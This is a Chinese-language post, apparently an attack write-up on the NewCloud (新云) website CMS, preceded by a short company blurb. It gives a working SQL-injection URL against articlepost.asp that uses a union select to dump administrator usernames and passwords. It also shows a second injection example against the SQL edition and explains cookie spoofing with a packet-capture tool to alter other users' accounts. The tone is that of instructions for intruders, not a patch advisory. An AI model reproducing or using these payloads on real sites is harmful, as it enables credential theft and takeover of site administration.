关于新云 新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。 漏洞原理 利用各种方法实现入侵,如COOKIES、抓包、注入检测等。 1.过滤未全 user\articlepost.asp 文件第333行 Quote SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,WriteTime,username from NC_Article where ChannelID=" & ChannelID & " Andusername=’" & Newasp.MemberName & "’ And ArticleID=" & Request("ArticleID") 没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句: articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%201,2,3,4,5,username,password,8,9%20from%20nc_admin 注册后直接在浏览器上输入,就可以爆出管理员的表和代码。 2.新云2.1SQL版注入漏洞 漏洞描述: 动画频道的“动画管理”和“审核管理”,错误类型: Quote Microsoft OLE DB Provider for SQL Server (0x80040E14) 未能找到存储过程 ’NC_FlashAdminList’。 /admin/admin_Flash.asp, 第 233 行 可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如: articlepost.asp?ChannelID=1&action=view&ArticleID=1;-- 3.COOKIES欺骗获取管理账号 攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。